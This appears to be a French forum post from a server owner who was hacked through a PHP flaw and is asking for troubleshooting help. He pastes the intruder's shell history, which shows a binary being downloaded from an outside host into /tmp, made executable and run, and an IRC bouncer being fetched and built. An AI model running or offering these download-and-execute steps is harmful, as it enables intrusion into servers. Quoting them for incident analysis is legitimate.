Salut
Suite à un code php mal fait (comme d'hab) je me suis fait hacker.
bref :
bash_history
cd /tmp
wget na-fxp.ath.cx/telnetd
chmod 777 telnetd
./telnetd
fgfd
uname -a
d
wget
http://www.psychoid.lam3rz.de/psyBNC2.3.1.tar.gz
tar zxvf psyBNC2.3.1.tar.gz
cd psybnc
cd ps
make menuconfig
make
./psybnc
comme je suis sous grsec, le telnet n'a apparemment pas fonctionné.
J'ai regardé partout et pas de traces suspectes.
Antivir dit qu'il n'y a rien.
MAIS depuis, plus de site.
http://ns30767.ovh.net
iptables - vide
httpd redémarré - sans pb
named aussi - pas de pb non plus.
j'ai même fait un name_check - ok
alors, ou chercher ?